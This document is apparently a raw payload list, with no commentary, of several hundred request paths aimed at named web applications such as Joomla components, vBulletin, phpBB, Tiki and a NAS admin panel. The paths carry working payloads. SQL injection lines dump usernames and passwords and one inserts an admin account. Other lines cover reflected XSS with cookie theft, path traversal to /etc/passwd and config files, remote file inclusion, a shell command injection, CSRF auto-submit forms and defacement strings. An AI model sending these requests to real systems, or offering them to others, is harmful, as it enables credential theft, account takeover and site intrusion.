/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 
/gsb/datetime.php"> <input type="text" name="delBackupName" value="; touch /tmp/ATTACKED"> <input type="text" name="backupRestoreFormSubmitted" value="b"> <input type="submit" value="Attack!"> </form> </body> </html> 
/?_action=editProducts&categoryID=[SQLI]
/?_action=showProducts&categoryID=[SQLI]&id=shop
/?_action=showProductDetails&productID=[SQLI]&categoryID=1310&id=shop
/?_action=showProductDetails&productID=22095&categoryID=[SQLI]&id=shop 
/admincp
/videodb/login.php?error=%3Cscript%3Ealert%20%28%27XSS%27%29%3C/script%3E 
/vb/viewpage.php?do=show&id=-1%20union%20select%200,2,3-- 
/search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http
/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = &#039;% 2Bimg = new Image (); img. src = «http
/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( &#039;id&#039;).»
/index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0Ã?3a,admin_password),3,4+from+rental_adminâ?? 
/index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
/index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- 
/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 
/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
/?action=search&search=[XSS] 
/index.php?login=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&pass=indoushka&passconfirm=indoushka&email=indoushka%40hotmail2E.com&stad=1&recruiter=Algeria-hackerz&submit=Sign%20Up
/pagerank.php?url="><script>alert(document.cookie)</script>
/pdf.php?lng=cmd.php
/newcms/struttura/manager.php?lng=cmd.php
/newcms/struttura/editor/quote.php?lng=cmd.php 
/archive.php?view=*** 
/login/prompt?message=%3Cscript%3Ealert%28%27Reflected%20XSS%27%29%3C/script%3E
/index.php?category=%22%3E[XSS] 
/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]
/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]
/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3] 
/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt> 
/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http
/scripts/seojobs/admin/addad.php?sbad_type="><script>alert(123)</script> 
/MySBB/misc.php/>'><ScRiPt>alert(469588561854)</ScRiPt>
/MySBB/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt> 
/templates/loadStyles.php?theme=file%00
/sources/javascript/loadScripts.php?scripts=[file]%00
/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script> 
/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site 
/sd/setup.php?op=language&lang=1
/sd/install/index.php?op=language&lang=1 
/admin/index.php?filename=../../../../../../../../../../etc/passwd%00 
/admin/girisyap.php
/dosyayukle/
/dosyayukle/dosyalar/ch99.php 
/drupal-6.16/index.php?q=http
/index.php?id_str=[SQLi]
/a_index.php?id_str=[SQLi]
/index.php?id_str=&#039;%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
/a_index.php?id_str=&#039;%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
/content.php?id=[LFI%00] 
/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 
/kdpics/admin/index.php3?page=options&categorie=">
//index.php?act=idx" style="text-decoration
/index.php?route=product%2Fspecial&path=20&page='
/index.php?route=product%2Fspecial&path=20&page=\'
/index.php?route=product%2Fcategory&path=20&page=andres'" 
/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_users(email,login,password,hash) VALUES ('','bad_guy','lsjfsofasgfs',md5('lsjfsofasgfslsjfsofasgfs'));;--&search=>>
/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>> 
/60cycleCMS/private/select.php?act=edit
/ddl/blacklist.php?site_name=[XSS] 
/rus/details/â??+benchmark(10000,md5(now()))+â??/
/rus/referaty/1'+benchmark(10000,md5(now()))-â??1/
/rus/â??+benchmark(10000,md5(now()))+â??/ 
/system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
/system/database/DB_driver.php?BASEPATH=[Shell.txt?] 
/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0 
/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=
/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
/index.php?option=com_d-greinar&Itemid=11&do=allar&maintree="><script>alert(/DevilZ TM/)</script> 
/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv=&#039;Set-cookie&#039;+content=&#039;cookiename=cookievalue&#039;>
/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http
/portal/index.php?a=d&id=[SQLi] 
/index.php?option=com_as&as=100&catid=-20 UNION SELECT 1,2,3,concat(username,0x3a,password)...+from+jos_users-- 
/efront/www/editor/tiny_mce/langs/language.php?langname=a/../../../../../../boot.ini%00
/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00 
/Joomla/index.php?option=com_alert&task=item&q_item=-1 union select 1, concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- 
/kb.php?mode=cat&cat=-1+union+select+1,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,2--
/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5 
/site/store/detail.php?articleId=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19--
/site/store/detail.php?articleId=">
/hack.php?H_name=bank"><script>alert(/Liscker/);</script>
/search.php?asc=desc"><script>alert(/Liscker/);</script>
/read.php?nowtime="><script>alert(/Liscker/);</script>
/post.php?fid=10"><script>alert(/Liscker/);</script>
/profile.php?action=forumright"><script>alert(/Liscker/);</script>
/thread.php?skinco=black"><script>alert(/Liscker/);</script>
/message.php?action=scout"><script>alert(/Liscker/);</script>
/sort.php?skinco=black"><script>alert(/Liscker/);</script>
/userpay.php?skinco=black"><script>alert(/Liscker/);</script> 
/PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r] 
/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-- 
/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script> 
/index.php?module=News&do=Category&id= [ SQL ] 
/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75+and+1=0+union+select+1,2,3,4,concat%28username,0xa,password,email%29,6,7,8+from+jos_users-- 
/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- 
/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00 
/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 
/index.php?form_url=>"> 
/ossim/control_panel/alarm_console.php/"><script>alert('xss')</script>
/ossim/control_panel/alarm_console.php/')"%20onMouseOver="alert('xss');// 
/newcopy/timeago.php?nid=../../../../../../../[file]%00
/update/timeago.php?nid=../../../../../../../[file]%00 
/Istgah/view_ad.php?id=/"&#039;><ScRiPt>alert(213771818860)</ScRiPt>
/cookiethief.php?cookie='+document.cookie;</script>' />
/helppage.php?page=../../../../etc/passwd%00 
/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00 
/download.php?filename=File.php 
/rss.php?module=../.htaccess%00
/index.php?ajax=../../.htaccess%00
/externalredirect.php?url=XSS 
/forum/view_topic.php?cat=1+union+select+1,concat(aUsername,0x3a,apassword),3,4,5,6,7+from+admins 
/flashcard/stateless/cPlayer.php?id="><iframe
/WorkArea/reterror.aspx?info=<script>alert('vulnerable')</script>
/workarea/medialist.aspx?action=ViewLibraryByCategory&selectids='; alert('Vulnerable');//
/workarea/blankredirect.aspx?http
/faq.php?id=SQL_CODE 
/index.php?online/&lt;script&gt;alert(213771818860)&lt;/script&gt;
/?lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
/index.php?module=adminpanel&type=admin&func=adminpanel&lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
/search.php?searchstr= [XSS] 
/v1.3/?mois=%2527&an=2010
/v1.3/commentaire.php?id='
/v1.3/?mois=3&an=>"><ScRiPt>alert(213771818860)</ScRiPt>
/velBox-cms-p30vel/admin/
/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd 
/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x 
/billwerx_rc522_pl2/request_account.php?campaign_id=1&group_id=6&interest_id=6&first_name=indoushka&last_name=indoushka&company_name=indoushka&home_number=indoushka&get_primary=indoushka&work_number=indoushka&mobile_number=indoushka&email_address=indoushka&comments=indoushka&request=REQUEST&close=CLOSE&primary_number=' [(SQL)] 
/upload.php 
/nporderitemremote.php?pos_mode=1&currency=USD&curdate=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110
/sound.php?catid=2 sql
/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8-- 
/Final/login/ava_up1.php
/Final/login/ava_up12.php 
/admin.php?p=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/productdemos/ApartmentSearch/listtest.php?r=-1 union select 0,user()-- 
/index.php?s=1%3Cbody+onload=alert(1)%3E 
/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin 
/wap/newsread.php?storyid=-1+UNION+SELECT+1,@@version,3,4 
//wwww.example.com/cat.php?cat=&lt;script&gt;alert(document.cookie);&lt;/script&gt;
/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2
/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 
/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x 
/?%22%3E%3Cb%3E%3Cscript%3Ex=document;alert%28x.cookie%29%3C/script%3E
/misc/get_admin.php" name="main">
/admin/edit_cms.php?page=1' name="frm" method='post' > <input name="title" type="hidden" value="Home"/> <input name="type" type="hidden" value="header"/> <input name="desc_meta" type="hidden" value="page+desc" /> <input name="desc_key" type="hidden" value='"><script>alert(document.cookie)</script>' /> <input name="cms_id" type="hidden" value="1" /> <input name="edit_page" type="hidden" value="Edit+Page" /> </form> <script> document.frm.submit(); </script> 
/admin/edit.php" name="editForm" method="POST" enctype="multipart/form-data">
/news/search?q=sdf%22+ANY_SQL_HERE 
/Ch99.php?directory=<iframe/+/onload=alert(213771818860)></iframe>
/Ch99.php?directory=<ScRiPt+bad=">"+src="http
/Ch99.php?directory=<img+src=http
/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC-- 
/viewtopic.php?topic=3"><script>alert(document.cookie)</script>&forum=1
/PHPFileUploader/_uploads/ch99.php__2010-01-02_10.00am.php 
/signupconfirm.php?name=indoushkax&login=hacked&pass=exploit&email=indoushka%40hotmail%2E.com&url=http%3A%2F%2F&bannerurl=<script>alert(213771818860)</script>&submit=%C7%D6%DB%D8%20%E3%D1%C9%20%E6%C7%CD%CF%C9%20%E1%E1%C7%D4%CA%D1%C7%DF
/idomains.php?do=encode&decoded=&ext=[ Xss ] 
/download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E
/Mobile/main/chatsmileys.php/>"><script>alert(213771818860)</script>
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 
/search.php?s=%3Cscript%3Ealert(/XSS/)%3C/script%3E 
/resin-admin/digest.php?digest_attempt=1&digest_realm="><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
/resin-admin/digest.php?digest_attempt=1&digest_username="><script>alert("ZnVjayBjbnZk")</script><a
/cms/user.php?toDo=showgallery&id=999999999999+UNION+SELECT+1,concat(password,0x3a,id),3,4,5,6,7,8,9,10,11,12,13,14+from+admin 
/softdirec/library/delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka
/gallery.php?cfg_admin_path=[shell.txt ]
/image.php?cfg_admin_path=[shell.txt ] 
/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6-- 
/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
/path_to_cp/list_content.php?cl=2%27%22%3E%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
/path_to_cp/edit_email.php?&id=contact_form_214%27+--+%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
/path_to_cp/cp_messages.php?action=view_inbox&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+
/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+ 
/forum.php?action=liste&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1"> 
/admin/?action=edit&slab=home" method="post" name="main" > <input type="hidden" name="title" value="Home" /> <input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' /> <input type="hidden" name="ptitle" value="" /> <input type="hidden" name="theme" value="theme-default" /> <input type="hidden" name="check_sidebar" value="sidebar" /> <input type="hidden" name="save" value="Save Content" /> </form> <script> document.main.submit(); </script> 
/admin/components.php" method="post" name="main" accept-charset="utf-8" >
/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+ 
/MD5/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> 
/links.php?cat_id=[XSS]
/links.php?siteid=[XSS]
/links.php?cat_id=1&cat_name=1[XSS] 
/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
/admin.php?module_id=329&security_token=$valid_token&page[0]=&page_size[0]=200+ANY_SQL_HERE+--++
/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc 
/path/page.php?theme=http
/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript
/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript
/news.php?id=<script><font color=red size=15>XSS</font></script> 
/www.example.com/74rG37_H057/smart_statistics_admin.php?type=page&name=">><FONT SIZE="70" FACE="courier" COLOR=red><MARQUEE BEHAVIOR=SCROLL HEIGHT=25 WIDTH=300 BGColor=navy>R3d-D3v!L W@S h3R3</MARQUEE></FONT>
/smilies_popup.php?details_var=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
/manage_pictures.php?profile_id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering 
/Hexjector/hexjector.php?site=<iframe src="http
/cms_data.php?page=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh4Ã?3d%20-%20http
/phpdug/upcoming.php?id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/demos/odig/display.php?folder=/>"><script>alert(123456789)</script> 
/admin/basic_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_config_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_alerts.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_firmware_automated.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_firmware_manual.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_general.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/shutdown_reboot.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/shutdown_reboot.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_advanced.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_generate_ssl_form.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/network_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/network_lan.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/network_service.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/network_workgroup_domain.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_disk_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_volume_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_share_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_usb_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_quota_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_download_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/system_change_btadmin_passwd.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_share_add.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/media_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/itune_server_properties.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/access_control_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/access_control_shareaccess_manage.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/status_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/status_log_system.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/status_log_cifs.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/status_log_ftp.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/status_log_setting.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_shutdown_reboot.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_machine.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_datetime.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_network.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_user_mgmt.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_user_add.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_share_mgmt.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_share_add.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_index.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/e_mionet.php?lang=en"><script>alert(&#039;XSS&#039;);</script>
/admin/basic_index.php?action=logout&lang=en"><script>alert(&#039;XSS&#039;);</script>
/help/system.php?lang=en"><script>alert(&#039;XSS&#039;);</script>&page=system_summary
/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd
/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd
/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA 
/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
/P47H/index_ie.php?page=-666
/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16
/manage/main.php?fld_path=XXX%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/frontend/x3/cpanelpro/doconvert.html?target=/etc/ 
/?action=search&title=item&blog=1&key=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicle%2Fbuy_do_search&page=[SQL Injection]
/vehicle/buy_do_search/?order_direction=[XSS] 
/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
/Video/showcasesearch.php?rowptem[template]=http
/Video/showcase2search.php?rowptem[template]=[EV!L] 
/1367_hitmaaan-13/?gall=fonds&levela=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/1367_hitmaaan-13/?gall=<img+src=http
/Video/addvideo.php 
/Video/register.php
/Video/search.php?order=>'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
/apt/members.php?action=msearch&by=[SQL] 
/index.php?r=[XSS] 
/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E
/themes/default/download.php?dfownload=../../includes/config.inc.php 
/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63 
/manager/index.php?id=4%27+ANY_SQL&a=16
/manager/index.php?a=106%27+ANY_SQL_HERE 
/index.php?option=com_easygb&Itemid=[XSS] 
/jforum/jforum.page?action=findUser&module=pm&username=�><script src=�http
/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
/products/orkutclone/scrapbook.php?id=[XSS] 
/signinform.php?msg=/"><marquee><font%20color=gren%20size=30>indoushka</font></marquee> 
/Ceica/login.php/>"><marquee><font%20color=red%20size=15>XroGuE</font></marquee>
/Ceica/login.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/path_to_firebook_admin/?param=1;show=../.htaccess;
/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html
/index.php?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1
